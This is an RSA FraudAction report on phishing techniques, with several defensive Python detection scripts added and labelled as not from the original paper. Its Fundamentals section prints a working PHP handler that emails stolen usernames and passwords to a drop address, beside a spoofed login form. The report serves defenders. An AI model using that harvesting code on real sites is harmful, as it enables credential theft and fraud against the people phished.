RSA FraudAction Intelligence

A DECADE OF PHISHING

November 2016


TABLE OF CONTENTS

Introduction
How to Set up a Phishing Campaign
  Fundamentals
How Does Phishing Work in the Real World?
Motivation - How Do Fraudsters Cash Out?
The Many Schemes and Techniques of Phishing
  The Tax Refund Ploy - Multi-branded Phishing
  Bulk Phishing Campaigns
  Random Folder Generators
  Local HTML Scheme
  BASE64 Encoded Phishing in a URL
  Phishing with MITM Capabilities
  Phishing Plus Mobile Malware in India
  Fast-Flux Phishing
  Additional Phishing Techniques


INTRODUCTION

Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have investigated, and also explains the techniques and inner workings of some recently seen schemes.

HOW TO SET UP A PHISHING CAMPAIGN

There is nothing complicated about setting up a phishing campaign. Phishing sites, like any website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and ‘back-end’ (HTML, PHP, etc.). Anyone with a little knowledge of web development can set up a phishing site without a hassle. Simple phishing sites are generally plain copies of legitimate customer login pages (front-end), where the action script (that handles the submitted information) is different from the legitimate one. Owing to this simplicity in the preparation process, phishing was, is, and will probably remain one of the most desirable scam techniques performed by fraudsters.

FUNDAMENTALS

What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the help of additional client-side scripting/markup languages such as JavaScript and CSS. These components are responsible for presenting text, pictures, and other graphics. In addition, PHP (Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to perform programming tasks, and fraudsters love it! PHP is a server-side scripting language that is relatively simple to write, and it is used by most websites today.

In every phishing site, there is an information form that victims are prompted to fill in with the requested details. In HTML, forms are composed like the following example:

<form method="POST" action="getdata.php">
  Username: <input type="text" name="username" /> <br/>
  Password: <input type="password" name="password" /> <br/><br/>
  <input type="submit" value="Login" />
</form>

The example login form above contains two data fields, Username and Password, defined by the input tag. The third input has a type defined as submit with a value defined as Login; this means that it will appear on the login screen as a submit button labeled Login. The form tags at the beginning and end of the script define a form with these fields. The form tag attributes method and action determine how the data is going to be handled when the victim clicks the Login button: the data will be submitted to the getdata.php handling script via an HTTP POST request.

How do fraudsters usually prepare all of the above? They copy the HTML source code of a legitimate site’s pages, and change the action attribute to a script they’ve written (usually in PHP). The easy method is just to get the submitted data and forward it to the fraudster’s email address (a.k.a. the drop email). Here’s an example of a getdata.php script:

<?php
// Read the two fields submitted by the login form
$username = $_POST['username'];
$password = $_POST['password'];

// Format the captured credentials ...
$message = "-----[Best HaXoR Ever]-----\n";
$message .= "Username: $username\n";
$message .= "Password: $password\n";
$message .= "-----[Best HaXoR Ever]-----\n";
$subject = "Phished data";

// ... and e-mail them to the drop address
mail("[email protected]", $subject, $message);
?>

Although most phishing sites still work in this simplified manner, during the last decade we’ve seen more advanced phishing techniques develop and evolve.

HOW DOES PHISHING WORK IN THE REAL WORLD?

Being a simple way to commit fraud, phishing usually doesn’t attract sophisticated threat actors. In some cases, they don’t even possess any programming knowledge. Phishing sites are commonly distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop emails in the relevant files of the kit. It is very convenient and easy for them to use. However, distributors or kit developers don’t spend their precious time just to make their ‘clients’, the fraudsters, happy. Many of the kits we have investigated contain hidden or obfuscated code that forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for example, if 100 fraudsters use these ‘infected’ kits distributed by a single kit author, he stands to harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online 100 times himself.
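The following Python script is an added example for analysts, not code from the RSA paper or from any kit it describes. It performs the static triage that the getdata.php example and the ‘infected kit’ observation above call for: it scans a recovered kit’s PHP files for mail() calls with a literal recipient (the fraudster’s drop email) and for base64 string literals that decode to an email address (the usual way a kit author hides a second drop address). The file names and addresses in the sample kit are constructed.

```python
"""Static triage of a phishing kit's PHP files for e-mail drop points.

Added example (not from the RSA paper): scans kit sources for mail() calls
with a literal recipient, and for base64 literals that decode to an e-mail
address, the usual way a kit author hides a second drop address.
"""
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# mail("recipient", ...) with a quoted literal as the first argument
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*(['\"])([^'\"]+)\1")
# quoted base64 blobs long enough to hold an address
B64_LITERAL_RE = re.compile(r"(['\"])([A-Za-z0-9+/]{16,}={0,2})\1")


def plain_drop_addresses(source: str) -> set:
    """Recipients passed to mail() as a plain string literal."""
    return {m.group(2) for m in MAIL_CALL_RE.finditer(source)
            if EMAIL_RE.fullmatch(m.group(2))}


def hidden_drop_addresses(source: str) -> set:
    """E-mail addresses found inside base64-encoded string literals."""
    found = set()
    for m in B64_LITERAL_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(2), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text
        found.update(EMAIL_RE.findall(decoded))
    return found


def triage_kit(files: dict) -> dict:
    """Map file name -> {'plain': set, 'hidden': set} for files with a drop point."""
    report = {}
    for name, source in files.items():
        plain, hidden = plain_drop_addresses(source), hidden_drop_addresses(source)
        if plain or hidden:
            report[name] = {"plain": plain, "hidden": hidden}
    return report


# Constructed sample kit (hypothetical file names and addresses)
_HIDDEN = base64.b64encode(b"kit-author@example.invalid").decode()
SAMPLE_KIT = {
    "getdata.php": (
        '<?php\n$username = $_POST["username"];\n$password = $_POST["password"];\n'
        'mail("fraudster@example.invalid", "Phished data", "$username:$password");\n?>'
    ),
    "inc/functions.php": (
        '<?php\n$z = "' + _HIDDEN + '";\n'
        'function send_log($m) { mail(base64_decode($GLOBALS["z"]), "log", $m); }\n?>'
    ),
    "style/login.css": "body { background: #fff; }",
}

if __name__ == "__main__":
    for name, hits in triage_kit(SAMPLE_KIT).items():
        print(name, hits)
```

Running the script on a kit directory (read each file into the dictionary) lists every file that carries a drop point and separates the fraudster’s visible address from any hidden one; both go into the takedown request, since the hidden address is the one that survives when a single ‘client’ of the kit is shut down.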

Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to make it available online. Here are two commonly used options for deployment:

Use a hacked website
Buy a site/domain

The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either hacks it himself or buys it in underground forums/shops selling compromised sites. The vendor of such a site provides the fraudster with a link to a ‘backdoor’ script (also in PHP), also known as a shell, that allows them to control and manage the site, uploading and deploying the phishing kit resources.

When a fraudster has the phishing URL ready (a deployed kit on a hijacked website), he needs to distribute it to potential victims. Distribution of phishing URLs is commonly performed via email messages. However, occasionally fraudsters can be more creative and use additional distribution vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email addresses are traded and sold in underground forums, and often the price depends on how good that list is. For example, how closely the email addresses match people from the geographic area of the targeted entity, and how many of them are active or online, can affect the price. If a fraudster is targeting a British bank, a verified active email address owned by a British citizen will fetch a higher price.


MOTIVATION - HOW DO FRAUDSTERS CASH OUT?

Not every financial institution becomes a fraudster’s target. The main qualifying factor is either a security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process. For example, knowing that phishing for PII (Personally Identifiable Information) such as mother’s maiden name and date of birth, tied together with other personal details, can help in transferring money from a victim’s account elsewhere will definitely draw a scammer’s attention.

Another option is fraudsters selling stolen data in the underground rather than trying to cash out the scam by themselves. This also offers the advantage of avoiding drawing attention from law enforcement authorities and company security departments. The buyers are usually people who are well versed in how to cash out, and are also willing to take on the risks involved. One more option is fraudsters collaborating with ‘money mules’. The money is transferred to a ‘mule’ account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to an ATM, withdraw the stolen money, and transfer it back to the first fraudster via a money transfer service (Western Union, MoneyGram, etc.). Another cash-out scheme is purchasing various products online using stolen credentials, and then re-selling the items. These are just a few examples of common cash-out techniques.

THE MANY SCHEMES AND TECHNIQUES OF PHISHING

THE TAX REFUND PLOY - MULTI-BRANDED PHISHING

One phishing scam that phishers love to use is to bait victims with a supposed tax refund notification via email, pretending to come from an official government tax/revenue service in different countries. When victims follow the link, they see a phishing website that has the same look and feel as the legitimate revenue service site of their country, with a list of all the banks in that region. The victim is prompted to select their bank and enter personal information to receive a refund. This ploy enables fraudsters to steal data from customers at several banks at once and increase their fraud coverage.

BULK PHISHING CAMPAIGNS

Another popular trend is performing phishing campaigns in bulk form. This means that rather than deploying a single phishing website whose URL is eventually sent to victims, fraudsters deploy them in bulk, and distribute the URLs randomly among phishing emails. This tactic increases the phishing site’s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the bulk scheme could encompass dozens of hijacked websites with several phishing directories on each one, resulting in hundreds of phishing websites. For example:

http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/oxk2hl/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/1be0lv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/cmq8wz/phishing_site/login.html
...
http://examplesite2.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/hkj3k7/phishing_site/login.html
...
http://examplesite3.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/hkj3k7/phishing_site/login.html
...

Detecting one or two of these URLs and shutting them down can still leave other URLs online. The randomly generated folder names in these phishing URLs make them much harder to detect. Needless to say, when fraudsters host the phishing attacks on domains that they bought, it complicates the handling of such attacks, as there is little or no cooperation from domain registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants are often more willing to cooperate and cease the abuse of their websites. These phishing campaigns are often orchestrated by several threat actors.

RANDOM FOLDER GENERATORS

Some of the newer phishing kits have been observed to generate a new randomized phishing URI for each new victim accessing the primary phishing link. The victims receive a link (by email or another distribution method) that redirects them to a folder-generating script. Once the victim accesses the link, a fresh (URI) folder is generated on the fly, resulting in a ‘personal’ phishing site dedicated to this instance and this victim. The folders are usually named with a random sequence of characters, often using the IP address or email address of the victim. In some cases, the entire folder is deleted as soon as the victim completes entering all of the requested personal information, and the data is sent off to a phishing drop site or email address.


Here is a generic example. The initial link in the phishing email looks like this:

http://somesite.net/folder1/folder2/index.php

The PHP code in the snapshot below is an example of a random folder-generating script. index.php is a PHP script that creates a random folder and copies all the required resource files from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive sitting in the ‘base’ directory of the phishing campaign, and deploys them as is, using the name of the archive folder.

(Code snapshot not reproduced. Its annotations read: random name generating function; randomize the name some more; logging every access in a file including IP, date, and browser type; file copying function; base directory, contents are copied from here; copy the contents to the generated folder and redirect to it.)

Phishing email
• Victim follows a folder-generating URL

Folder-generating script
• New randomly-named folder is generated
• Required files are copied from base directory to new folder
• Victim is redirected to newly generated URL

Newly generated folder
• Phishing site is presented to victim


This scheme is simple to operate, but it complicates detection and shutdown efforts much like the other schemes described here. When one randomly deployed phishing URL is detected, it might be deleted in minutes, which can mislead security personnel into thinking that the site has been brought down. In actual fact, the site remains active and online, simply waiting for a new victim to access the initial link. In order to handle these cases effectively, it is crucial to detect and shut down the ‘base’ directory (or archive) that contains the initial phishing site and resources.
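The Python script below is an added example, not code from the RSA paper. It serves both the bulk-campaign URL lists and the random-folder scheme above from the takedown analyst’s side: given a feed of detected URLs, it finds the path position that varies (the bulk or per-victim folder), groups the sibling URLs that share the rest of the path, reports templates that have been copied onto several hosts, and derives the base directory above the variable segment, which is the shutdown target the text identifies. The hosts in the sample feed are the paper’s examplesiteN.com placeholders plus constructed benign blog URLs.

```python
"""Group phishing URLs that differ only in one randomised path segment.

Added example (not from the RSA paper): given a feed of detected URLs, it
finds the path position that varies (the bulk or per-victim folder), the
sibling URLs that share the rest of the path, and the base directory above
the variable segment, which the text identifies as the shutdown target.
"""
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit


def _templates(url):
    """Yield ((host, template), segment) with each path segment wildcarded in turn."""
    parts = urlsplit(url)
    segments = parts.path.strip("/").split("/")
    for i, seg in enumerate(segments):
        template = "/".join(segments[:i] + ["*"] + segments[i + 1:])
        yield (parts.netloc, template), seg


def find_clusters(urls, min_variants=3):
    """Return {(host, template): sorted variable segments} for templates seen
    with at least min_variants distinct values in the wildcarded position."""
    seen = defaultdict(set)
    for url in urls:
        for key, seg in _templates(url):
            seen[key].add(seg)
    return {key: sorted(segs) for key, segs in seen.items() if len(segs) >= min_variants}


def shared_templates(clusters):
    """Templates deployed on more than one host: the same kit copied around."""
    hosts = defaultdict(set)
    for (host, template) in clusters:
        hosts[template].add(host)
    return {t: sorted(h) for t, h in hosts.items() if len(h) > 1}


def base_directory(host, template, scheme="http"):
    """URL of the directory above the variable segment, i.e. where the
    folder-generating index.php and the kit's base files would live."""
    prefix = "" if template.startswith("*") else template.split("/*", 1)[0]
    path = "/" + prefix + "/" if prefix else "/"
    return urlunsplit((scheme, host, path, "", ""))


# Constructed sample feed: three hosts carrying the same bulk kit plus two
# ordinary blog URLs that should not be flagged
SAMPLE_URLS = [
    f"http://examplesite1.com/pathtobulkphish/{t}/phishing_site/login.html"
    for t in ("qwsd21", "wqpwow", "ux78nj", "adhwe1", "hkj3k7")
] + [
    f"http://examplesite2.com/pathtobulkphish/{t}/phishing_site/login.html"
    for t in ("qwsd21", "wqpwow", "ux78nj")
] + [
    f"http://examplesite3.com/pathtobulkphish/{t}/phishing_site/login.html"
    for t in ("qwsd21", "wqpwow", "ux78nj")
] + [
    "http://examplesite1.com/blog/2016/11/post.html",
    "http://examplesite1.com/blog/2016/10/post.html",
]

if __name__ == "__main__":
    clusters = find_clusters(SAMPLE_URLS)
    for (host, template), variants in clusters.items():
        print(host, template, len(variants), "->", base_directory(host, template))
    print(shared_templates(clusters))
```

The clustering is data-driven rather than based on a ‘looks random’ heuristic, because the random tokens in the feed above include ones with no digits (wqpwow, mnjnde) that a character-class test would miss; what they all share is that only one path position changes while every other segment stays fixed. The min_variants threshold keeps ordinary dated or paginated paths out of the report.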

LOCAL HTML SCHEME

The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached to an email message. Victims are prompted to open it and fill out their personal data. The phishing site contents are placed in a single HTML file (except for the data handling script and drop point URL, which are incorporated in the form tag’s action attribute described earlier). The script can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website. In both cases, the data is usually sent to the fraudster’s drop email.

Below is a snapshot of part of a Local HTML file’s contents (the form) with a remote drop point URL.

From a cyber-security perspective, it may be difficult to shut down the site when the drop script is hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank page is normally displayed), causing hosting facilities to think it is offline. On the other hand, online form services are more cooperative in shutting down fraudster accounts.


BASE64 ENCODED PHISHING IN A URL

Most major browsers today support a feature called the data URI scheme. This feature enables encoding the webpage content with BASE64 encoding into a string seen in the browser address bar. Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in regular online hosted phishing. When hosted online, it helps scammers to conceal the main phishing URL. The data URI is injected into the address bar using JavaScript’s window.location property or an HTML meta refresh.

The screenshot below shows the data URI as it appears in the address bar.

This is an example of the script for injecting the data URI into the browser address bar.
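The following Python script is an added example, not code from the RSA paper; it covers both the Local HTML scheme and the BASE64 data URI variant from a mail-gateway or analyst’s point of view. It parses an HTML document for forms that collect a password and submit it to an absolute http(s) URL (the remote drop point of a Local HTML attachment), and it unpacks any data:text/html;base64 URI found in page source (as set by window.location or a meta refresh) so the same check runs on the hidden page. The host names in the samples are constructed.

```python
"""Find credential forms in HTML attachments and in base64 data: URIs.

Added example (not from the RSA paper): parses an HTML document for <form>
elements that contain a password field and post to an absolute http(s) URL
(the remote drop point of a 'Local HTML' attachment), and unpacks
data:text/html;base64 URIs found in page source (window.location or
meta refresh) so the same check can run on the hidden page.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

DATA_URI_RE = re.compile(r"data:text/html(?:;charset=[\w-]+)?;base64,([A-Za-z0-9+/=]+)")


class FormCollector(HTMLParser):
    """Record each form's action, method and number of password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "",
                             "method": (attrs.get("method") or "get").lower(),
                             "password_fields": 0}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["password_fields"] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_forms_with_remote_action(html):
    """Forms that collect a password and submit it to an absolute http(s) URL."""
    parser = FormCollector()
    parser.feed(html)
    return [f for f in parser.forms
            if f["password_fields"] and urlsplit(f["action"]).scheme in ("http", "https")]


def embedded_html_documents(source):
    """Decode every data:text/html;base64 URI present in a page's source."""
    docs = []
    for m in DATA_URI_RE.finditer(source):
        try:
            docs.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            continue  # malformed base64
    return docs


def analyse(source):
    """Suspicious forms in the page itself plus in any data: URI it carries."""
    hits = credential_forms_with_remote_action(source)
    for doc in embedded_html_documents(source):
        hits.extend(credential_forms_with_remote_action(doc))
    return hits


# Constructed samples (hypothetical hosts)
LOCAL_HTML_ATTACHMENT = """<html><body>
<form method="POST" action="http://hijacked-host.example/cgi/getdata.php">
  Username: <input type="text" name="username" />
  Password: <input type="password" name="password" />
  <input type="submit" value="Login" />
</form>
<form action="/search"><input type="text" name="q" /></form>
</body></html>"""

_INNER = base64.b64encode(LOCAL_HTML_ATTACHMENT.encode()).decode()
REDIRECTOR_PAGE = ('<html><head><script>window.location="data:text/html;base64,'
                   + _INNER + '";</script></head><body></body></html>')

if __name__ == "__main__":
    print(analyse(LOCAL_HTML_ATTACHMENT))
    print(analyse(REDIRECTOR_PAGE))
```

The redirector page contains no form of its own, so a scanner that only looks at the fetched HTML reports nothing; decoding the data URI first is what exposes the credential form and its drop URL, which is the host to include in the takedown request.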

PHISHING WITH MITM CAPABILITIES

Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most, and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that while the victim is interacting with a phishing site, behind the scenes and not visible to the victim, the phishing site communicates with and performs actions on the legitimate site. This capability is implemented with the PHP cURL module. cURL is used to transfer data through various protocols, including HTTP. To develop a script that imitates the user’s actions on a legitimate site, some reverse engineering is required on the part of the fraudster to understand which requests and data are forwarded to the legitimate site.


Below is a code sample illustrating the cURL object used for communicating with the legitimate online-banking site.

The script in the snapshot below is a cURL class used for communicating with the legitimate online banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).


The config.php in the snapshot below contains the fraudster’s account used to receive the stolen funds transfer.

Another part of the phishing script, seen below, uses the cURL object to transfer funds from the victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown above).

The MITM phishing scheme offers a fraudster many advantages. The fraudster can:

Log in to the legitimate site to check the validity of stolen credentials
Browse the victim’s account after login to view the account balance
Grab additional personal information such as phone number, address, etc.

In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing site’s original IP address and use an IP in the desired country to match the victim’s locale. This results in a low profile in the logs of fraud monitoring systems, which flag suspicious activity if actions carried out on the legitimate site are detected as originating from a region other than the customer’s or the financial institution’s website locale. Moreover, there are cases where the phishing kit checked the victim’s account balance, and when it was higher than a given amount, it transferred the funds to a ‘mule’ account at the same bank through the legitimate site.

These kits/phishing sites are relatively rare as they require higher-level coding skills and reverse engineering of the legitimate websites.

In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario, the funds in the account are transferred out almost instantly, making it a very serious threat in cyber-space.
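The Python script below is an added example, not code from the RSA paper, written from the bank’s fraud-monitoring side. A MITM phishing backend drives the legitimate site from its own host or from one proxy, so even when the geolocation check described above is defeated, a single source address still performs successful logins for many unrelated customers in a short window, typically with an identical User-Agent. The script parses a constructed application audit log (the line format is hypothetical, not any product’s) and flags source IPs with that pattern.

```python
"""Flag a source IP that logs into many different accounts in a short window.

Added example (not from the RSA paper): a MitM phishing backend drives
the legitimate site from its own host (or a proxy), so one source address
performs successful logins for many unrelated customers.  The log format
here is a constructed application audit log, not any real product's format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ts>\S+) login (?P<result>ok|fail) user=(?P<user>\S+) '
    r'ip=(?P<ip>\S+) ua="(?P<ua>[^"]*)"$')


def parse_events(lines):
    """Turn audit-log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        event = m.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return events


def shared_source_logins(events, min_accounts=3, window=timedelta(minutes=10)):
    """Return {ip: sorted accounts} for IPs with successful logins to at least
    min_accounts distinct accounts inside any window-sized time span."""
    by_ip = defaultdict(list)
    for e in events:
        if e["result"] == "ok":
            by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_accounts:
                flagged[ip] = sorted(users)
                break
    return flagged


# Constructed sample: 203.0.113.7 logs four customers in six minutes with an
# identical User-Agent; 198.51.100.4 is one customer logging in twice.
SAMPLE_LOG = """\
2016-11-03T10:15:01Z login ok user=alice ip=203.0.113.7 ua="Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
2016-11-03T10:15:30Z login ok user=erin ip=198.51.100.4 ua="Mozilla/5.0 (iPhone) Safari/602.1"
2016-11-03T10:16:40Z login ok user=bob ip=203.0.113.7 ua="Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
2016-11-03T10:17:12Z login fail user=mallory ip=203.0.113.7 ua="Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
2016-11-03T10:18:05Z login ok user=carol ip=203.0.113.7 ua="Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
2016-11-03T10:20:59Z login ok user=dave ip=203.0.113.7 ua="Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
2016-11-03T11:02:10Z login ok user=erin ip=198.51.100.4 ua="Mozilla/5.0 (iPhone) Safari/602.1"
""".splitlines()

if __name__ == "__main__":
    print(shared_source_logins(parse_events(SAMPLE_LOG)))
```

Shared corporate egress or carrier NAT addresses also produce many accounts per IP, so in production the threshold is set per address class and the hit is combined with the other indicators the text mentions (session timing, a balance check immediately followed by a transfer to a new payee) rather than used alone.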


PHISHING PLUS MOBILE MALWARE IN INDIA

Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The Tax Refund scheme described earlier, which operates via a spoofed government revenue service site, was recently modified to include an SMS message sent to the victim’s phone at the end of the phishing process. The SMS contains a link that downloads and deploys a malicious APK (Android mobile malware archive).

This new ploy makes use of a number of schemes and techniques described earlier, including a random folder generator, BASE64 data URI, the tax-refund scheme, and more. The link provided in the phishing emails leads victims to a redirection URL (performed via the BASE64 data URI). That URL leads to an outer-frame site, using a script that communicates with a remote SQL database to retrieve the inner-frame URL.

Phishing email
• Victim clicks on redirection link

Redirection
• Victim is redirected to outer-frame URL
• The redirecting source code is obfuscated with unescape
• Redirecting code executes using data URI

Outer-frame
• Communicates with SQL database to get inner-frame URL
• Presents inner-frame hosted on a URL different from the outer-frame

Inner-frame (folder-generator)
• Randomly named folder is generated in a random parent directory
• Victim is redirected to the new folder

Phishing site
• Victim is prompted to select a bank
• Victim is prompted to enter personal data including phone number
• Compromised data is sent to remote drop URL

Victim receives short-URL link via SMS
• The link leads to a URL for downloading the malicious Android application
• Once the APK is installed, the victim's data on the smartphone is compromised


The snapshot below shows part of the outer-frame code, communicating with a remote SQL database.

The inner-frame phishing URL generates a random folder in a random parent directory, which is different from the usual folder-generators that create a new folder under the same path. The phishing site prompts the victims to choose their bank from a long list of Indian banks to begin the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.


The kit uses a configuration file containing URLs for the resources needed by the phishing site:

A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing the images from the legitimate site, which can trigger detection
A drop URL that receives and logs stolen data
A URL with the SMS sending script for the malicious APK
A short URL that is sent to victims
The last page file that victims see at the end of the phishing process

The code snapshot below is an example of the phishing site configuration file.

Once the victim finishes going through all the phishing pages, the folder is deleted. To add further spice to this scheme, upon entering their phone number in this site, the victim receives an SMS message with a link prompting the download of a malicious APK file (Android application) under the pretense of ‘mobile verification’.

The random URL generation, where links are created and deleted per victim, complicates detection and shutdown by cyber security services. The impact of this trend is beyond ‘regular’ phishing, since at the end of the process, the victim’s phone is infected by a malicious application. That mobile malware application keeps on stealing data from the phone long after the personal data has been phished via a simple phishing site. Since many banks today employ two-factor authentication using SMS messages for online banking, this malicious app can be even more harmful, allowing the fraudster control over the phone and the second channel for authentication.


FAST-FLUX PHISHING

One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated is commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late). These are usually phishing sites hosted on Fast-Flux networks: phishing attack domains that are hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in order to bring down these attacks, our analysts can only contact the registrars, as contacting the ISP/hosting provider would not help to get to the root problem. Domains are often generated automatically in this scheme for the sole purpose of hosting phishing and malware. Each domain contained dozens of URLs targeting several entities, making campaigns very profitable for the scam authors. Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets of many infected ‘zombie’ computers. It involves DNS records with a short TTL in order to achieve IP address randomization.

This scheme is not as common recently as it was in the past.
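The following Python script is an added example, not code from the RSA paper. It turns the Fast-Flux description above into a check an analyst can run on DNS observations: given A-record snapshots for one domain captured minutes apart (answer IPs plus TTL), it reports the indicators the text names, a short TTL, a large and changing set of addresses, and addresses spread across many networks (botnet hosts rather than one hosting range). The snapshots are constructed from documentation address ranges; ip_network /24 grouping stands in for ASN lookup, which would need an external dataset.

```python
"""Score a domain's DNS answers over time for fast-flux behaviour.

Added example (not from the RSA paper): takes a series of A-record
snapshots (answer IPs plus TTL) captured minutes apart for one domain and
reports the indicators the text describes: short TTL, a large and changing
set of IPs, and addresses spread across many networks (botnet hosts rather
than one hosting range).  Snapshots below are constructed sample data.
"""
from ipaddress import ip_network


def flux_indicators(snapshots, max_ttl=300, min_ips=5, min_networks=3):
    """Return a summary dict with a 'fast_flux' verdict and the reasons."""
    ips, ttls, churn = set(), [], 0
    previous = None
    for snap in snapshots:
        current = set(snap["a"])
        if previous is not None and current != previous:
            churn += 1  # answer set changed between consecutive lookups
        previous = current
        ips |= current
        ttls.append(snap["ttl"])
    # /24 grouping as a stand-in for ASN diversity (no external data needed)
    networks = {str(ip_network(f"{ip}/24", strict=False)) for ip in ips}
    reasons = []
    if max(ttls) <= max_ttl:
        reasons.append(f"TTL <= {max_ttl}s")
    if len(ips) >= min_ips:
        reasons.append(f"{len(ips)} distinct IPs")
    if len(networks) >= min_networks:
        reasons.append(f"{len(networks)} distinct /24 networks")
    if churn >= max(1, (len(snapshots) - 1) // 2):
        reasons.append(f"answers changed in {churn} of {len(snapshots) - 1} intervals")
    return {"distinct_ips": len(ips), "networks": len(networks),
            "max_ttl": max(ttls), "churn": churn,
            "fast_flux": len(reasons) == 4, "reasons": reasons}


# Constructed sample: four lookups a few minutes apart for a fluxing domain
FLUX_SNAPSHOTS = [
    {"ttl": 180, "a": ["192.0.2.10", "198.51.100.23", "203.0.113.77"]},
    {"ttl": 180, "a": ["192.0.2.44", "198.51.100.23", "203.0.113.5"]},
    {"ttl": 180, "a": ["192.0.2.10", "198.51.100.91", "203.0.113.5"]},
    {"ttl": 180, "a": ["192.0.2.44", "198.51.100.91", "203.0.113.77"]},
]

# Constructed sample: a CDN-style domain, short TTL but a stable answer set
CDN_SNAPSHOTS = [
    {"ttl": 60, "a": ["198.51.100.10", "198.51.100.11"]},
    {"ttl": 60, "a": ["198.51.100.11", "198.51.100.10"]},
    {"ttl": 60, "a": ["198.51.100.10", "198.51.100.11"]},
]

if __name__ == "__main__":
    print(flux_indicators(FLUX_SNAPSHOTS))
    print(flux_indicators(CDN_SNAPSHOTS))
```

A short TTL on its own is not evidence, since content delivery networks use short TTLs as well; the CDN sample above trips only that one indicator. It is the combination with a large, churning answer set across unrelated networks that marks the botnet-hosted domain, and that combination is what supports the registrar-level takedown the text describes.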


ADDITIONAL PHISHING TECHNIQUES

In addition to the more notable and prevalent phishing schemes we have described, there are a few more techniques available in the phishing arsenal that are not as well known, but are still out there and are worth noting.

Filtering by Geolocation and Email Address

